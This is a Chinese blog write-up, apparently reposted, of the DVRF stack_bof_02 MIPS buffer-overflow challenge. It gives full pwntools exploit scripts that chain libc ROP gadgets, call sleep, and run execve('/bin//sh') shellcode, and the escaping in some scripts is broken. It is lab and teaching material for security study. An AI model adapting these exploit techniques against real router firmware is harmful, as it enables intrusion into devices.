内容简介:DVRF 的第二个栈溢出程序是 stack_bof_2,这题和上一道题的差异就在于这道题没有给我们后门函数,
前言
DVRF 的第二个栈溢出程序是 stack_bof_2,这题和上一道题的差异就在于这道题没有给我们后门函数, 需要自己构造 shellcode 来进行调用。
README 文件里也做了说明,所以这里的重点 是 ROP 链的构造以及 sleep(1) 的用法。
确定偏移
和上一道题一样,首先我们需要确定 ra 的偏移。
使用 patternLocOffset.py 生成 500 个长度的 pattern(或者使用 pwntools 里的自带的工具 cyclic),并开启 gdb 调试端口
nick@nick-machine:~/iot/DVRF/Firmware/_DVRF_v03.bin.extracted/squashfs-root$ python ../../../../tools/patternLocOffset.py -c -l 500 -f ./pattern [*] Create pattern string contains 500 characters ok! [+] output to ./pattern ok! [+] take time: 0.0106 s nick@nick-machine:~/iot/DVRF/Firmware/_DVRF_v03.bin.extracted/squashfs-root$ ./qemu-mipsel -g 23946 -L ./ ./pwnable/ShellCode_Required/stack_bof_02 "`cat ./pattern`"
在 0x400928 处下断点,得到此时 ra 寄存器的值是 0x72413971
python ../../../../tools/patternLocOffset.py -s 0x72413971 -l 500
这里得到偏移是 508 个字节。
ROP 构造详解
这里溢出到 $ra 寄存器需要 508 个字节,后面的四个字节就是需要构造的 ROP 的地址。
调用 sleep(1) 函数
之所以要调用 sleep 函数的原因,
调用 sleep 函数的前提是先布置好他的参数 $a0 = 1。
所以这里我们先在 libc 中搜索一下将参数 1 赋值给 $a0 寄存器的 gadget: "li $a0,1"
gadget 的末尾是:
jr $s1
所以在原来覆盖栈数据时候就要求我们能够 覆盖 $s1 寄存器 ,以达到跳转到下一个 gadget 的目的。
但是在 main 函数的汇编语句的末尾,没有找到类似 lw $s0,0x123($sp)
这样的汇编语句,所以我们无法控制 $s1 寄存器
所以这里我们需要先找到一个 将栈上的数据传递给 $s1 寄存器的 gadget
这里使用 mipsrop.tail()
来搜索 gadget
找到的都不太能够满足我们的要求,这里根据下面这篇文章,找到一个特别不错的 gadget。 也就是上图中 scandir
函数的结尾的部分
跳转到 0xAFE0 之后,我们就可以继续在原来的栈上布置下一步的 gadget
了。
- 在此之前我们还需要和上一篇的方法一样,在 gdb 调试中找到 libc 的基地址。(vmmap 或者 i proc mappings)
使用 pwntools
工具生成填充文件
from pwn import * libc_addr = 0x766e5000 payload = 'a' * 508 payload += p32(libc_addr + 0x0000Afe0) with open('stack2_fill','wb') as f: f.write(payload) print("OKn")
开启 gdb 调试:
./qemu-mipsel -g 23946 -L ./ ./pwnable/ShellCode_Required/stack_bof_02 "`cat ./stack2_fill`"
还是断在 0x400928
处
单步,可见我们需要布置的下一个 gadget 的位置在 $sp+0x3c
(ra 寄存器位置)
根据调试,我们需要在原来的 payload
后面 padding 0x3c
个字节才能控制 ra 寄存器
libc_addr = 0x766e5000 payload = 'a' * 508 payload += p32(libc_addr + 0x0000Afe0) # jr $ra payload += 'b' * 0x3c # padding payload += 'c' * 4 # ra
在这填充的 0x3c 个字节中,我们对于 s0 – fp 寄存器的值都是可控的,那么接下来就好办了。在这 0x3c 个字节中, 拆分填充成这几个寄存器的值 就行了。
我们还是采用上面那个 0x0002FB10
地址的 gadget
,ra 设置为这个地址,那么这里的 s1 寄存器的值就需要填充为下一个 gadget
的地址
- 这里不能直接填充为 sleep 函数的地址 ,因为我们这里没办法控制 ra 寄存器。如果直接调用 sleep 函数的话就没办法返回了。所以需要找到一个既可以调用 sleep 函数又可以控制 ra 寄存器的 gadget
mipsrop.find("move $t9,$s3")
找到 0x00021C34
这个地址的 gadget
这里的 s3 寄存器就填充为 sleep 函数地址,调用完成之后继续返回到这个 gadget 的 jr $ra
。
这里的 ra 寄存器的值就填充为下一个 gadget
的地址
这时的 payload
:
from pwn import * context.endian = 'little' context.arch = 'mips' libc_addr = 0x766e5000 sleep_offset = 0x0002F2B0 payload = 'a' * 508 payload += p32(libc_addr + 0xAfe0) # jr $ra payload += 'b' * (0x3c - 4 * 9) payload += 'a' * 4 # s0 payload += p32(libc_addr + 0x21C34) # s1 payload += 'a' * 4 # s2 payload += p32(libc_addr + sleep_offset) # s3 payload += 'a' * 4 # s4 payload += 'a' * 4 # s5 payload += 'a' * 4 # s6 payload += 'a' * 4 # s7 payload += 'a' * 4 # fp payload += p32(libc_addr + 0x2FB10) # ra #---------------stack 2 (0x21C34)------------------- payload += 'c' * 0x2c payload += p32(next_gadget_addr)
调用 shellcode
继续下一步的 gadget
的调用,我们这次使用 mipsrop.stackfinder()
找到 0x000171CC
这一处的 gadget
。
这里的 $a0 寄存器是从栈上来取值, 我们就可以向 $a0 对应的位置填充我们的 shellcode。 这里的 $s3 就需要在前一步的 gadget 中实现填充为类似 jr $a0
的 gadget
再次进行搜索,找到一处:
Python>mipsrop.find("move $t9, $a0") ---------------------------------------------------------------------------------------------------------------- | Address | Action | Control Jump | ---------------------------------------------------------------------------------------------------------------- | 0x000214A0 | move $t9,$a0 | jalr $a0 | ----------------------------------------------------------------------------------------------------------------
正好可以满足我们的条件。
因此在第二个栈的 payload
为:
payload += 'c' * 0x24 payload += p32(libc_addr + 0x000214A0) # s3 payload += 'd' * 4 # s4 payload += p32(libc_addr + 0x171CC) # ra #payload += p32(libc_addr + 0x000214A0) # s3 #payload += 'd' * 4 payload += 'd' * 0x18 # shellcode payload += shellcode
- 在 MIPS 指令集中,0x20 和 0x00 都是坏字节 。因此要注意 gadget 的地址不能包含这两个值
在 这里 找到可用的 shellcode,往栈上填充就行了。
shellcode += "xffxffx06x28" # slti $a2, $zero, -1 shellcode += "x62x69x0fx3c" # lui $t7, 0x6962 shellcode += "x2fx2fxefx35" # ori $t7, $t7, 0x2f2f shellcode += "xf4xffxafxaf" # sw $t7, -0xc($sp) shellcode += "x73x68x0ex3c" # lui $t6, 0x6873 shellcode += "x6ex2fxcex35" # ori $t6, $t6, 0x2f6e shellcode += "xf8xffxaexaf" # sw $t6, -8($sp) shellcode += "xfcxffxa0xaf" # sw $zero, -4($sp) shellcode += "xf4xffxa4x27" # addiu $a0, $sp, -0xc shellcode += "xffxffx05x28" # slti $a1, $zero, -1 shellcode += "xabx0fx02x24" # addiu;$v0, $zero, 0xfab shellcode += "x0cx01x01x01" # syscall 0x40404
在 gdb 中调试的效果是:
所以最后的 exp:
from pwn import * context.endian = 'little' context.arch = 'mips' payload += "xffxffx06x28" # slti $a2, $zero, -1 payload += "x62x69x0fx3c" # lui $t7, 0x6962 payload += "x2fx2fxefx35" # ori $t7, $t7, 0x2f2f payload += "xf4xffxafxaf" # sw $t7, -0xc($sp) payload += "x73x68x0ex3c" # lui $t6, 0x6873 payload += "x6ex2fxcex35" # ori $t6, $t6, 0x2f6e payload += "xf8xffxaexaf" # sw $t6, -8($sp) payload += "xfcxffxa0xaf" # sw $zero, -4($sp) payload += "xf4xffxa4x27" # addiu $a0, $sp, -0xc payload += "xffxffx05x28" # slti $a1, $zero, -1 payload += "xabx0fx02x24" # addiu;$v0, $zero, 0xfab payload += "x0cx01x01x01" # syscall 0x40404 shellcode = payload libc_addr = 0x766e5000 sleep_offset = 0x0002F2B0 payload = 'a' * 508 payload += p32(libc_addr + 0xAfe0) # jr $ra payload += 'b' * (0x3c - 4 * 9) payload += 'a' * 4 # s0 payload += p32(libc_addr + 0x21C34) # s1 payload += 'a' * 4 # s2 payload += p32(libc_addr + sleep_offset) # s3 payload += 'a' * 4 # s4 payload += 'a' * 4 # s5 payload += 'a' * 4 # s6 payload += 'a' * 4 # s7 payload += 'a' * 4 # fp payload += p32(libc_addr + 0x2FB10) # ra #---------------stack 2 (0x21C34)------------------- payload += 'c' * 0x24 payload += p32(libc_addr + 0x000214A0) # s3 payload += 'd' * 4 # s4 payload += p32(libc_addr + 0x171CC) # ra #payload += p32(libc_addr + 0x000214A0) # s3 #payload += 'd' * 4 payload += 'f' * 0x18 # shellcode payload += shellcode with open('stack2_fill','wb') as f: f.write(payload)
重新加载一下程序就可以 getshell
./qemu-mipsel -L ./ ./pwnable/ShellCode_Required/stack_bof_02 "`cat ./stack2_fill`"
如果上面的 exp 用不了的话,也可以试试这个:
from pwn import * context.endian = ‘little’ context.arch = ‘mips’ libc_addr = 0x766e5000 sleep_offset = 0x0002F2B0 sleep_end_addr = 0x767144c8 shellcode = “” shellcode += “xffxffx06x28” # slti $a2, $zero, -1 shellcode += “x62x69x0fx3c” # lui $t7, 0x6962 shellcode += “x2fx2fxefx35” # ori $t7, $t7, 0x2f2f shellcode += “xf4xffxafxaf” # sw $t7, -0xc($sp) shellcode += “x73x68x0ex3c” # lui $t6, 0x6873 shellcode += “x6ex2fxcex35” # ori $t6, $t6, 0x2f6e shellcode += “xf8xffxaexaf” # sw $t6, -8($sp) shellcode += “xfcxffxa0xaf” # sw $zero, -4($sp) shellcode += “xf4xffxa4x27” # addiu $a0, $sp, -0xc shellcode += “xffxffx05x28” # slti $a1, $zero, -1 shellcode += “xabx0fx02x24” # addiu;$v0, $zero, 0xfab shellcode += “x0cx01x01x01” # syscall 0x40404 payload = ‘a’ * 508 payload += p32(libc_addr + 0xAfe0) # jr $ra payload += ‘b’ (0x3c - 4 9) payload += ‘a’ 4 # s0 payload += p32(libc_addr + 0x21C34) # s1 payload += ‘a’ 4 # s2 payload += p32(libc_addr + sleep_offset) # s3 payload += ‘a’ 4 # s4 payload += ‘a’ 4 # s5 payload += ‘a’ 4 # s6 payload += ‘a’ 4 # s7 payload += ‘a’ * 4 # fp payload += p32(libc_addr + 0x2FB10) # ra ———————-stack 2—————————- payload += ‘c’ 0x24 payload += p32(libc_addr + 0x000214A0) # s3 payload += ‘d’ 4 # s4 payload += p32(libc_addr + 0xAfe0) # ra ———————-stack 3—————————- payload += ‘a’ (0x3c-49) payload += p32(libc_addr + 0x000214A0) # s0 payload += ‘a’ 4 # s1 payload += ‘a’ 4 # s2 payload += ‘a’ 4 # s3 payload += ‘a’ 4 # s4 payload += ‘a’ 4 # s5 payload += ‘a’ 4 # s6 payload += ‘a’ 4 # s7 payload += ‘a’ 4 # fp payload += p32(libc_addr + 0x0001B230) # ra payload += ‘f’ * 0x28 payload += shellcode with open(‘stack2_fill’,’wb’) as f: f.write(payload) print(“OKn”)
总结
个人认为构造 gadget
的要点是要思路要清晰,对栈的布局要有一个清楚的了解。还有就是需要熟悉 mipsrop 工具的使用。多动手调试,多踩坑才会长经验。
参考文章
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网
猜你喜欢:- 路由器漏洞挖掘之栈溢出入门(二)
- 路由器漏洞挖掘之 DIR-815 栈溢出漏洞分析
- 让WiFi溢出房间、蓝光电影眨眼即现…360“黑客级”路由亮相
- 缓冲区溢出(栈溢出)
- Linux kernel 4.20 BPF 整数溢出-堆溢出漏洞及其利用
- 缓冲区溢出实战教程系列(一):第一个缓冲区溢出小程序
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
代码大全(第2版)
[美] 史蒂夫·迈克康奈尔 / 金戈、汤凌、陈硕、张菲 译、裘宗燕 审校 / 电子工业出版社 / 2006-3 / 128.00元
第2版的《代码大全》是著名IT畅销书作者史蒂夫·迈克康奈尔11年前的经典著作的全新演绎:第2版不是第一版的简单修订增补,而是完全进行了重写;增加了很多与时俱进的内容。这也是一本完整的软件构建手册,涵盖了软件构建过程中的所有细节。它从软件质量和编程思想等方面论述了软件构建的各个问题,并详细论述了紧跟潮流的新技术、高屋建瓴的观点、通用的概念,还含有丰富而典型的程序示例。这本书中所论述的技术不仅填补了初......一起来看看 《代码大全(第2版)》 这本书的介绍吧!
XML 在线格式化
在线 XML 格式化压缩工具
HEX CMYK 转换工具
HEX CMYK 互转工具